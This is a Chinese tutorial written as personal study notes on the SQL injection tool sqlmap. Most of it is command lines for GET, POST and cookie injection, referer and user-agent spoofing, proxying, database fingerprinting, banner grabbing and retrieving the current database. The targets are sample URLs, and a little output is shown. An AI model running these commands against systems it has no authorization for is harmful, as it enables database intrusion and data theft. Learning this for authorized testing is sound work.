sqlmap学习手记及sqlmap注入命令的使用方法

早两年都接触了BT5，也学习了SQLmap.真的是神器，这边学那边忘记，真是老了，不是公司逼着干活，也不想在学。忘记的原因是没有真正的理解他。

通过几天的学习整理，大概悟出了门路，写出来方便你我他，转载注明动力软件园.

首先大概了解一下sqlmap有多强大吧。都支持那些注入，get,post(./sqlmap.py -r 文本参数，form表单模式，指定参数模式) ，cookie注入。还有user-agent和referer，后边的这两个是干啥的，我不太会，求指导。

支持盲注，错误回显注入，还有其他多种注入方法。支持代理，优化算法，更高效。指纹识别技术判断数据库，更高深的我也不写了，我还没彻底理解，这篇文章只是抛砖引玉而已。

1、我们平时遇到的http://192.168.1.47/page.php?id=1 这些都是get注入，目前很多网站都使用了看门狗之类，在测试http://192.168.1.47/page.php?id=1 1=1  的时候都提示非法参数。这个时候get注入就可以放弃了。

2、使用POST方法提交

sqlmap.py -u “http://www.pw88.com /sqlmap/oracle/post_int.php” –method POST –data “id=1″

3、使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “http://www.pw88.com/sqlmap/mssql/cookie_int.php” –cookie “id=1″ -v 1

4、使用referer欺骗

python sqlmap.py -u “http:/www.pw88.com/sqlmap/pgsql/get_int.php?id=1″ –referer “http://www.google.com” -v 3

5、使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “http://www.pw88.com/sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 1 -a “./txt/user-agents.txt”

7、通过代理注入

python sqlmap.py -u “http://192.168.1.47/page.php?id=1&cat=2″ –proxy

“http://127.0.0.1:8118″

8、指定关键词，也可以不指定。程序会根据返回结果的hash自动判断

python sqlmap.py -u “http://192.168.1.47/page.php?id=1&cat=2″ –string

“STRING_ON_TRUE_PAGE”

9、指定数据，这样就不用猜测其他的数据库里。可以提高效率。

–remote-dbms

10、指纹判别数据库类型

python sqlmap.py -u “http://192.168.1.47/page.php?id=1&cat=2″ -v 1 -f

11、获取banner信息

python sqlmap.py -u “http://192.168.1.47/page.php?id=1&cat=2″ -b

banner: ‘5.0.38-Ubuntu_0ubuntu1.1-log’

12、获取当前数据库，当前用户，所有用户，密码，所有可用数据库。

python sqlmap.py -u “http://192.168.1.47/page.php?id=1&cat=2″ —

current-db

current database: ‘testdb’

请注意版权！转载须写明出处:动力软件园 http://www.pw88.com